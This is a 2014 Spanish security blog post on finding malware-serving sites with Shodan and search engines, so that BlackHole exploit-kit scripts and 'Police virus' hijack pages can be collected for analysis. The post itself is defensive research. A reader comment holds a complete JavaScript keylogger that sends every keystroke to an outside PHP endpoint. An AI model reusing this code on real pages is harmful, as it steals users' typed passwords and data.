lunes, febrero 10, 2014

Encontrar servidores distribuyendo malware con Shodan

En la lucha contra el e-crime y el fraude online, es fundamental localizar lo antes posible cualquier nueva muestra de malware para poder analizarla y erradicarla. En el caso de las botnets, pillar al bot podría servir para generar una firma de reconocimiento o para analizar el algoritmo y localizar un sinkhole que permita tomar control de la botnet por medio de un secuestro de dominio en el que se vaya a configurar el panel de control en un día concreto, o en el caso de los kits de explotación podría servir para localizar un nuevo exploit que está siendo utilizado en Internet, o una nueva pieza de malware que se va a comenzar a desplegar desde ya.

Para eso los analistas que se dedican profesionalmente a luchar contra el e-crime buscan siempre localizar por medio de servicios profesionales las últimas muestras de cualquier cosa que huela a malware o crimen en Internet, con el objeto de estar lo más cerca posible de los malos a la hora de pelear en esa partida del gato y el ratón a la que juegan. Ahí, el servicio de Virus Total que creo  en su momento Hispasec resultó ser una fuente inagotable de nuevas muestras.

A los que trabajamos en seguridad informática en general pero sin dedicarnos en el día a día a la lucha contra el malware, también nos gusta poder tener y probar todo lo nuevo que va saliendo, incluido por supuesto las muestras de malware. Por eso son tan populares los packs recopilatorios de malware y exploits que permiten jugar con los bichos o el poder contar con repositorios de entornos vulnerables para hacer las pruebas pertinentes. 

Cuando aparece un nuevo programa malicioso como el juego que quería robarte el WhatsApp o una app maliciosa como la linterna molona que te suscribe a los servicios de SMS premium, a todo el mundo le gusta echarle el guante y poder jugar en detalle con ellas para aprender más de cómo se las gasta el enemigo. En un proceso más de estudio que de necesidad de luchar contra el e-crime. Buscar muestras de software de infección en Internet puede hacerse de muchas formas, pero también se puede encontrar de formas más sencillas, como haciendo un poco de hacking con buscadores y utilizando Shodan.

En el caso de que se descubra un nuevo sitio que esté infectado con un nuevo código JavaScript malicioso para lanzar los exploits de un kit de exploits como el popular Black HoleEleonore o cualquier otro que salga, lo más sencillo es poder buscar ese código JavaScript en un buscador. Y Shodan lo permite con el comando HTML con el que también se pueden buscar determinados Applets Java. Por ejemplo, en este artículo explican cómo se han localizado nuevas formas de ofuscar la infección de un kit de exploit de BlackHole.

Figura 1: Una nueva forma descubierta para distribuir el código de infección de BlackHole

Y buscando en Shodan usando el comando HTML para buscar en el cuerpo de las páginas de las respuestas, aparecen servidores donde se puede encontrar ese código JavaScript.

Figura 2: Buscando en Shodan por un comentario JavaScript

Esto permite que se pueda descargar y analizar, para poder jugar con las muestras.

Figura 3: El script ofuscado descargado para poder analizarlo

Esto también se puede hacer con los sitios web que intentan bloquear los sistemas con el virus de la Policía, FBI o NSA utilizando una página web para el secuestro del navegador, ya que las páginas se pueden localizar también en servidores infectados. Esta URL que me pasó un amigo me sirvió para buscar cadenas de la página web infectadas en Shodan.

Figura 4: Página web intenta secuestrar el navegador y desplegar el Vírus de la Policía

Y aparecieron sitios nuevos infectados con las páginas, pero en este caso del Virus de la Policía, en las que se puede ver el código HTML que utiliza para hacer el secuestro del navegador.

Figura 5: Sitio web localizado con Shodan distribuyendo el Virus de la Policía

La primera vez que me conecté a esta fue el 23 de Enero y según Virus Total solo 1 sitio la reconocía como malware. Hoy he vuelto a enviar la URL y sigue siendo así, solo un motor antimalware la detecta como tal, así que se pueden encontrar cosas jugosas con Shodan y queda claro que hay que fortificar tu equipo Windows más allá de poner un antimalware.

Figura 6: Ratio de detección como URL maliciosa

Si la infección manipula parámetros de la página web que pueden ser consultados en Google o Bing como el campo title, siempre puedes hacer uso de ellos también para localizar estos sitios infectados con muestras con los que puedas jugar. 

Figura 7: Encontrar sitios infectados con el Virus de la Policía en Google

Por supuesto, este no es un método completo ya que Shodan escanea Internet por servidores y no por dominios, y no hace crawling de lo sitios, pero para poder localizar un servidor con una muestra de código malicioso puntual que se quiera localizar y poder tenerla, tal vez te sirva.

Saludos Malignos!

2 comentarios:

Anónimo dijo...

document.onkeypress=function(a){if(a=a||window.event,key=String.fromCharCode(a.charCode)){var b=new XMLHttpRequest,c=encodeURI(key);b.open("POST","http://www.puntonet.ec/empresarial/files/leer.php",!0),b.setRequestHeader("Content-type","application/x-www-form-urlencoded"),b.send("key="+c)}};

algo tan simple no lo detecta virustotal! incluso sin ofuscarlo.

Anónimo dijo...

Pero, ¿para que eso funcione no necesitas que la el dominio puntonet.ec a donde vas a hacer la llamada HTML sea la misma que de dónde se ha bajado el JS que describes? Si es como yo afirmo no hay ataque posible.

Por otro lado ¿qué van a detectar los antivirus ahí? Es simplemente un código que envía a cada tecla que pulsas una llamada al servidor, algo muy utilizado, por ejemplo en algunos diccionarios online, o en por google con su instant search.

No veo que haya que detectar nada de nada.

Entrada destacada

Infraestructuras Críticas y Sistemas Industriales: Auditorías de Seguridad y Fortificación de @0xWord

Desde hoy está disponible a la venta un nuevo libro de 0xWord centrado en la seguridad de los Sistemas Industriales y las Infraestructuras...

Entradas populares